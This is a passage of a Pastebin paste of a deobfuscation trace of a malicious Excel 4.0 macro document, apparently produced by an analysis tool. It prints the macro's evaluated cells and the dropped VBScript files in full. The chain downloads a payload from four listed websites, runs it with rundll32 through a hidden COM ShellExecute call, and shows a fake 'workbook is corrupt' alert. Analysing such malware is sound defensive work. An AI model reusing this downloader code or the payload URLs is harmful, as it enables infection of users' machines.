  277. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  278. CELL:BJ56404 , FullEvaluation , [TRUE] GOTO(R56410C62)
  279. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  280. CELL:BJ56404 , FullEvaluation , [FALSE]
  281. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  282. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  283. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  284. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  285. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  286. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  287. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  288. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  289. CELL:BJ56396 , FullEvaluation , [FALSE]
  290. CELL:BJ56397 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  291. CELL:BJ56398 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  292. CELL:BJ56399 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  293. CELL:BJ56400 , FullEvaluation , IF(R56398C62<40000,,GOTO(R56411C62))
  294. CELL:BJ56401 , FullEvaluation , "https://gurukal.in/wp-crunch.php"
  295. CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  296. CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
  297. CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
  298. CELL:BJ56404 , FullEvaluation , [FALSE]
  299. CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
  300. CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
  301. CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
  302. CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
  303. CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
  304. CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
  305. CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  306. CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  307. CELL:FL18287 , FullEvaluation , [FALSE] GOTO(R23779C121)
  308. CELL:DQ23779 , FullEvaluation , "=""C:\Users\Public\mWwd6De.html"""
  309. CELL:DQ23780 , FullEvaluation , "=""C:\Users\Public\M737Q.vbs"""
  310. CELL:DQ23781 , FullEvaluation , "=FOPEN(R45257C10,3)"
  311. CELL:DQ23782 , FullEvaluation , "=FWRITELN(R45258C10,""hquS = """"https://estudiolacazezancarini.com/wp-crunch.php"""""")"
  312. CELL:DQ23783 , FullEvaluation , "=FWRITELN(R45258C10,""fpiT = """"https://germdisruptor.com/wp-crunch.php"""""")"
  313. CELL:DQ23784 , FullEvaluation , "=FWRITELN(R45258C10,""fSRoqzx = """"https://gurukal.in/wp-crunch.php"""""")"
  314. CELL:DQ23785 , FullEvaluation , "=FWRITELN(R45258C10,""jP5 = """"https://indoeducation.com/wp-crunch.php"""""")"
  315. CELL:DQ23786 , FullEvaluation , "=FWRITELN(R45258C10,""hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)"")"
  316. CELL:DQ23787 , FullEvaluation , "=FWRITELN(R45258C10,""Dim kNV: Set kNV = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  317. CELL:DQ23788 , FullEvaluation , "=FWRITELN(R45258C10,""Function eHMCbJ(data):"")"
  318. CELL:DQ23789 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.setOption(2) = 13056"")"
  319. CELL:DQ23790 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.Open """"GET"""", data, False"")"
  320. CELL:DQ23791 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  321. CELL:DQ23792 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.Send"")"
  322. CELL:DQ23793 , FullEvaluation , "=FWRITELN(R45258C10,""eHMCbJ = kNV.Status"")"
  323. CELL:DQ23794 , FullEvaluation , "=FWRITELN(R45258C10,""End Function"")"
  324. CELL:DQ23795 , FullEvaluation , "=FWRITELN(R45258C10,""For Each qXtq in hoxLrA"")"
  325. CELL:DQ23796 , FullEvaluation , "=FWRITELN(R45258C10,""If eHMCbJ(qXtq) = 200 Then"")"
  326. CELL:DQ23797 , FullEvaluation , "=FWRITELN(R45258C10,""Dim woOQbQ0: Set woOQbQ0 = CreateObject(""""ADODB.Stream"""")"")"
  327. CELL:DQ23798 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Open"")"
  328. CELL:DQ23799 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Type = 1"")"
  329. CELL:DQ23800 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Write kNV.ResponseBody"")"
  330. CELL:DQ23801 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.SaveToFile """"""&R45256C10&"""""", 2"")"
  331. CELL:DQ23802 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Close"")"
  332. CELL:DQ23803 , FullEvaluation , "=FWRITELN(R45258C10,""Exit For"")"
  333. CELL:DQ23804 , FullEvaluation , "=FWRITELN(R45258C10,""End If"")"
  334. CELL:DQ23805 , FullEvaluation , "=FWRITELN(R45258C10,""Next"")"
  335. CELL:DQ23806 , FullEvaluation , "=FCLOSE(R45258C10)"
  336. CELL:DQ23807 , FullEvaluation , "=EXEC(""explorer.exe ""&R45257C10&"""")"
  337. CELL:DQ23808 , FullEvaluation , "=WHILE(ISERROR(FILES(R45256C10)))"
  338. CELL:DQ23809 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  339. CELL:DQ23810 , FullEvaluation , "=NEXT()"
  340. CELL:DQ23811 , FullEvaluation , "=FILE.DELETE(R45257C10)"
  341. CELL:DQ23812 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  342. CELL:DQ23813 , FullEvaluation , "=""C:\Users\Public\Bmk.vbs"""
  343. CELL:DQ23814 , FullEvaluation , "=FOPEN(R45290C10,3)"
  344. CELL:DQ23815 , FullEvaluation , "=""rundll32.exe"""
  345. CELL:DQ23816 , FullEvaluation , "=R45256C10&"",DllRegisterServer"""
  346. CELL:DQ23817 , FullEvaluation , "=""C:\Windows\System32"""
  347. CELL:DQ23818 , FullEvaluation , "=FWRITELN(R45291C10,""Set RSHCGfB5 = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  348. CELL:DQ23819 , FullEvaluation , "=FWRITELN(R45291C10,""RSHCGfB5.Document.Application.ShellExecute """"""&R45292C10&"""""",""""""&R45293C10&"""""",""""""&R45294C10&"""""",Null,0"")"
  349. CELL:DQ23820 , FullEvaluation , "=FCLOSE(R45291C10)"
  350. CELL:DQ23821 , FullEvaluation , "=EXEC(""explorer.exe ""&R45290C10&"""")"
  351. CELL:DQ23822 , FullEvaluation , "=GOTO(R18256C168)"
  352. CELL:DQ23823 , FullEvaluation , ON.TIME(2020-06-26 11:40:53.355704,'VyNand2egLwRTDtMIW'!AV40173)
  353. CELL:AV40173 , FullEvaluation , FORMULA("=FORMULA(R[-16395]C[73],R[5082]C[-38])",VyNand2egLwRTDtMIW$AV$40174:$AV$40217)
  354. CELL:AV40174 , FullEvaluation , FORMULA("=""C:\Users\Public\mWwd6De.html""",R[5082]C[-38])
  355. CELL:AV40175 , FullEvaluation , FORMULA("=""C:\Users\Public\M737Q.vbs""",R[5082]C[-38])
  356. CELL:AV40176 , FullEvaluation , FORMULA("=FOPEN(R45257C10,3)",R[5082]C[-38])
  357. CELL:AV40177 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""hquS = """"https://estudiolacazezancarini.com/wp-crunch.php"""""")",R[5082]C[-38])
  358. CELL:AV40178 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""fpiT = """"https://germdisruptor.com/wp-crunch.php"""""")",R[5082]C[-38])
  359. CELL:AV40179 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""fSRoqzx = """"https://gurukal.in/wp-crunch.php"""""")",R[5082]C[-38])
  360. CELL:AV40180 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""jP5 = """"https://indoeducation.com/wp-crunch.php"""""")",R[5082]C[-38])
  361. CELL:AV40181 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)"")",R[5082]C[-38])
  362. CELL:AV40182 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Dim kNV: Set kNV = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[5082]C[-38])
  363. CELL:AV40183 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Function eHMCbJ(data):"")",R[5082]C[-38])
  364. CELL:AV40184 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.setOption(2) = 13056"")",R[5082]C[-38])
  365. CELL:AV40185 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.Open """"GET"""", data, False"")",R[5082]C[-38])
  366. CELL:AV40186 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[5082]C[-38])
  367. CELL:AV40187 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.Send"")",R[5082]C[-38])
  368. CELL:AV40188 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""eHMCbJ = kNV.Status"")",R[5082]C[-38])
  369. CELL:AV40189 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""End Function"")",R[5082]C[-38])
  370. CELL:AV40190 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""For Each qXtq in hoxLrA"")",R[5082]C[-38])
  371. CELL:AV40191 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""If eHMCbJ(qXtq) = 200 Then"")",R[5082]C[-38])
  372. CELL:AV40192 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Dim woOQbQ0: Set woOQbQ0 = CreateObject(""""ADODB.Stream"""")"")",R[5082]C[-38])
  373. CELL:AV40193 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Open"")",R[5082]C[-38])
  374. CELL:AV40194 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Type = 1"")",R[5082]C[-38])
  375. CELL:AV40195 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Write kNV.ResponseBody"")",R[5082]C[-38])
  376. CELL:AV40196 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.SaveToFile """"""&R45256C10&"""""", 2"")",R[5082]C[-38])
  377. CELL:AV40197 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Close"")",R[5082]C[-38])
  378. CELL:AV40198 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Exit For"")",R[5082]C[-38])
  379. CELL:AV40199 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""End If"")",R[5082]C[-38])
  380. CELL:AV40200 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Next"")",R[5082]C[-38])
  381. CELL:AV40201 , FullEvaluation , FORMULA("=FCLOSE(R45258C10)",R[5082]C[-38])
  382. CELL:AV40202 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R45257C10&"""")",R[5082]C[-38])
  383. CELL:AV40203 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R45256C10)))",R[5082]C[-38])
  384. CELL:AV40204 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[5082]C[-38])
  385. CELL:AV40205 , FullEvaluation , FORMULA("=NEXT()",R[5082]C[-38])
  386. CELL:AV40206 , FullEvaluation , FORMULA("=FILE.DELETE(R45257C10)",R[5082]C[-38])
  387. CELL:AV40207 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[5082]C[-38])
  388. CELL:AV40208 , FullEvaluation , FORMULA("=""C:\Users\Public\Bmk.vbs""",R[5082]C[-38])
  389. CELL:AV40209 , FullEvaluation , FORMULA("=FOPEN(R45290C10,3)",R[5082]C[-38])
  390. CELL:AV40210 , FullEvaluation , FORMULA("=""rundll32.exe""",R[5082]C[-38])
  391. CELL:AV40211 , FullEvaluation , FORMULA("=R45256C10&"",DllRegisterServer""",R[5082]C[-38])
  392. CELL:AV40212 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[5082]C[-38])
  393. CELL:AV40213 , FullEvaluation , FORMULA("=FWRITELN(R45291C10,""Set RSHCGfB5 = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[5082]C[-38])
  394. CELL:AV40214 , FullEvaluation , FORMULA("=FWRITELN(R45291C10,""RSHCGfB5.Document.Application.ShellExecute """"""&R45292C10&"""""",""""""&R45293C10&"""""",""""""&R45294C10&"""""",Null,0"")",R[5082]C[-38])
  395. CELL:AV40215 , FullEvaluation , FORMULA("=FCLOSE(R45291C10)",R[5082]C[-38])
  396. CELL:AV40216 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R45290C10&"""")",R[5082]C[-38])
  397. CELL:AV40217 , FullEvaluation , FORMULA("=GOTO(R18256C168)",R[5082]C[-38])
  398. CELL:AV40218 , FullEvaluation , ON.TIME(2020-06-26 11:40:53.394678,'VyNand2egLwRTDtMIW'!J45256)
  399. CELL:J45256 , FullEvaluation , "C:\Users\Public\mWwd6De.html"
  400. CELL:J45257 , FullEvaluation , "C:\Users\Public\M737Q.vbs"
  401. CELL:J45258 , FullEvaluation , FOPEN("C:\Users\Public\M737Q.vbs",3)
  402. CELL:J45259 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","hquS = ""https://estudiolacazezancarini.com/wp-crunch.php""")
  403. CELL:J45260 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","fpiT = ""https://germdisruptor.com/wp-crunch.php""")
  404. CELL:J45261 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","fSRoqzx = ""https://gurukal.in/wp-crunch.php""")
  405. CELL:J45262 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","jP5 = ""https://indoeducation.com/wp-crunch.php""")
  406. CELL:J45263 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)")
  407. CELL:J45264 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Dim kNV: Set kNV = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  408. CELL:J45265 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Function eHMCbJ(data):")
  409. CELL:J45266 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.setOption(2) = 13056")
  410. CELL:J45267 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.Open ""GET"", data, False")
  411. CELL:J45268 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
  412. CELL:J45269 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.Send")
  413. CELL:J45270 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","eHMCbJ = kNV.Status")
  414. CELL:J45271 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","End Function")
  415. CELL:J45272 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","For Each qXtq in hoxLrA")
  416. CELL:J45273 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","If eHMCbJ(qXtq) = 200 Then")
  417. CELL:J45274 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Dim woOQbQ0: Set woOQbQ0 = CreateObject(""ADODB.Stream"")")
  418. CELL:J45275 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Open")
  419. CELL:J45276 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Type = 1")
  420. CELL:J45277 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Write kNV.ResponseBody")
  421. CELL:J45278 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.SaveToFile ""C:\Users\Public\mWwd6De.html"", 2")
  422. CELL:J45279 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Close")
  423. CELL:J45280 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Exit For")
  424. CELL:J45281 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","End If")
  425. CELL:J45282 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Next")
  426. CELL:J45283 , PartialEvaluation , FCLOSE("C:\Users\Public\M737Q.vbs")
  427. CELL:J45284 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\M737Q.vbs")
  428. CELL:J45285 , PartialEvaluation , WHILE(ISERROR(FILES(R45256C10)))
  429. CELL:J45288 , PartialEvaluation , FILE.DELETE("C:\Users\Public\M737Q.vbs")
  430. CELL:J45289 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  431. CELL:J45290 , FullEvaluation , "C:\Users\Public\Bmk.vbs"
  432. CELL:J45291 , FullEvaluation , FOPEN("C:\Users\Public\Bmk.vbs",3)
  433. CELL:J45292 , FullEvaluation , "rundll32.exe"
  434. CELL:J45293 , FullEvaluation , "C:\Users\Public\mWwd6De.html,DllRegisterServer"
  435. CELL:J45294 , FullEvaluation , "C:\Windows\System32"
  436. CELL:J45295 , FullEvaluation , FWRITE("C:\Users\Public\Bmk.vbs","Set RSHCGfB5 = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  437. CELL:J45296 , FullEvaluation , FWRITE("C:\Users\Public\Bmk.vbs","RSHCGfB5.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\mWwd6De.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  438. CELL:J45297 , PartialEvaluation , FCLOSE("C:\Users\Public\Bmk.vbs")
  439. CELL:J45298 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Bmk.vbs")
  440. CELL:J45299 , FullEvaluation , GOTO(R18256C168)
  441. CELL:FL18256 , End , CLOSE(FALSE)
  442. CELL:FL18266 , FullEvaluation , [FALSE] GOTO(R18256C168)
  443. CELL:FL18256 , End , CLOSE(FALSE)
  444.  
  445. Files:
  446.  
  447. Files: path C:\Users\Public\qyUV.vbs, access 3
  448. On Error Resume Next
  449. Set VFYjmh = CreateObject("WScript.Shell")
  450. Set Yt1jI = CreateObject("Scripting.FileSystemObject")
  451. Set BIj = Yt1jI.CreateTextFile("C:\Users\Public\gzGD.txt", True)
  452. BIj.WriteLine(VFYjmh.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
  453. BIj.Close
  454.  
  455.  
  456. Files: path C:\Users\Public\M737Q.vbs, access 3
  457. hquS = "https://estudiolacazezancarini.com/wp-crunch.php"
  458. fpiT = "https://germdisruptor.com/wp-crunch.php"
  459. fSRoqzx = "https://gurukal.in/wp-crunch.php"
  460. jP5 = "https://indoeducation.com/wp-crunch.php"
  461. hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)
  462. Dim kNV: Set kNV = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  463. Function eHMCbJ(data):
  464. kNV.setOption(2) = 13056
  465. kNV.Open "GET", data, False
  466. kNV.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  467. kNV.Send
  468. eHMCbJ = kNV.Status
  469. End Function
  470. For Each qXtq in hoxLrA
  471. If eHMCbJ(qXtq) = 200 Then
  472. Dim woOQbQ0: Set woOQbQ0 = CreateObject("ADODB.Stream")
  473. woOQbQ0.Open
  474. woOQbQ0.Type = 1
  475. woOQbQ0.Write kNV.ResponseBody
  476. woOQbQ0.SaveToFile "C:\Users\Public\mWwd6De.html", 2
  477. woOQbQ0.Close
  478. Exit For
  479. End If
  480. Next
  481.  
  482.  
  483. Files: path C:\Users\Public\Bmk.vbs, access 3
  484. Set RSHCGfB5 = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  485. RSHCGfB5.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\mWwd6De.html,DllRegisterServer","C:\Windows\System32",Null,0
  486.  
  487.  
  488. [END of Deobfuscation]
  489. time elapsed: 5.384254693984985
  490.  
  491. Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!